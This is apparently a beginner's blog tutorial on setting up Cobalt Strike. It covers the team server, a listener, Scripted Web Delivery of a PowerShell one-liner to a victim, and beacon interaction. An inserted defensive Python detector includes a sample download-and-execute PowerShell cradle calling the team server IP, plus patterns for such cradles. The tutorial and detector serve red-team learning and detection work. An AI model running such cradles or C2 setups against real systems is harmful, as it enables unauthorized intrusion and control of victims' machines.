As an aspiring Red Teamer, I’ve recently started playing with Cobalt Strike, so I thought it would be a good idea to start a series of blog posts on using it and its many features. As some of you may be aware, Cobalt Strike is software for Adversary Simulations and Red Team Operations.
More information can be found here: https://www.cobaltstrike.com
In this first post, I will quickly go through how to get Cobalt Strike up and running on your system, create a listener and interact with a victim’s machine. This will be short and to the point. 🙂
If you haven’t used Cobalt Strike before, I’m going to presume that you haven’t got a full licensed copy. A trial copy can be requested at the following URL:
Installation and setup can be found here:
Once you have your trial copy downloaded and prerequisites installed, you can begin.
Starting the team server
From within the Cobalt Strike directory, type the following command to start the team server. 192.168.0.12 is the IP address of my Kali Linux system. Note: The password can be anything you desire.
./teamserver <IP Address> <password>
Starting Cobalt Strike
Type the following command to start the Cobalt Strike user interface
Connecting to the team server
Once you have started Cobalt Strike, you are required to connect to your team server. Fill in the details including the password you set when starting the team server. The User field can be anything you want. Use your super cool hacker handle here. ;P
Cobalt Strike’s user interface
Once connected, you will be presented with the Cobalt Strike user interface where you will interact with your agents and do all sorts of other cool stuff.
Creating a listener
You will be required to create a listener for your compromised machines to connect to. Simply click Cobalt Strike – Listeners.
Once the Listeners tab has loaded, click Add.
Give the listener a name; in this case, I called it “C2”. Select your desired payload, ensure the IP address is correct (team server IP) and choose a port to listen on.
Here you can input a domain name that points to your team server. We will use an IP address in this case.
The listener has been created and can be viewed, deleted, etc. from the Listeners tab.
Delivering the payload
We are now going to quickly compromise a host and have it connect to our team server in order to interact with it.
Select Attacks – Web Drive-by – Scripted Web Delivery
This will provide us with a PowerShell one-liner to run on the victim host.
Here we select the options to configure our quick web server to host and deliver the PowerShell one-liner.
Copy the URL provided.
Switch over to the victim’s machine and paste in the PowerShell one-liner. Just to be clear, this is for demonstration purposes. In reality, the payload would be delivered to the victim via some sort of social engineering attack.
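From the defender's side, the execution step above leaves a process-creation record on the victim host. The following is an added example, not part of the original post or of Cobalt Strike: it scores PowerShell command lines for the download-and-execute pattern. The event format, the function names and the sample command lines are constructed, and the shape of the one-liner is an assumption, since the post does not show it.

```python
import re

# A download cradle is a network fetch combined with in-memory execution.
FETCH = re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|invoke-restmethod", re.I)
EXEC = re.compile(r"\biex\b|invoke-expression", re.I)
# Flags that often accompany it (powershell.exe accepts the abbreviations).
FLAGS = {
    "no_profile": re.compile(r"\s-nop(rofile)?\b", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
URL = re.compile(r"https?://[^\s'\"\)]+", re.I)

def score_command_line(cmdline):
    """Return (score, reasons, urls) for one process command line."""
    if not re.search(r"\b(powershell|pwsh)(\.exe)?\b", cmdline, re.I):
        return 0, [], []
    reasons = [name for name, rx in FLAGS.items() if rx.search(cmdline)]
    score = len(reasons)
    if FETCH.search(cmdline) and EXEC.search(cmdline):
        reasons.append("download_and_execute")  # strongest signal
        score += 3
    elif FETCH.search(cmdline):
        reasons.append("network_fetch")  # common in admin scripts, weak alone
        score += 1
    return score, reasons, URL.findall(cmdline)

def triage(events, threshold=3):
    """Return the events whose command line scores at or above threshold."""
    hits = []
    for ev in events:
        score, reasons, urls = score_command_line(ev["cmdline"])
        if score >= threshold:
            hits.append({"host": ev["host"], "score": score, "reasons": reasons, "urls": urls})
    return hits

# Constructed process-creation records (the kind of data Sysmon Event ID 1
# or Security Event 4688 with command-line auditing provides).
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.12:80/a'))\""},
    {"host": "WS02", "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"host": "WS03", "cmdline": "powershell.exe -Command \"Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip\""},
    {"host": "WS04", "cmdline": "cmd.exe /c ipconfig /all"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Only the WS01 record crosses the threshold; the extracted URL gives the host and port to search for in proxy and firewall logs.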
Interacting with the victim host
Once the PowerShell one-liner is executed, the victim will connect to the team server and be available for interaction.
To interact with the host, right-click on the compromised host and click Interact.
For demonstration, I typed the following command:
beacon> shell ipconfig /all
Hopefully this gave you some insight into how easy it is to get started with Cobalt Strike. There will be many more blog posts surrounding this excellent product.
If you’re itching to learn more, I’d recommend reading through the Cobalt Strike manual: https://www.cobaltstrike.com/downloads/csmanual39.pdf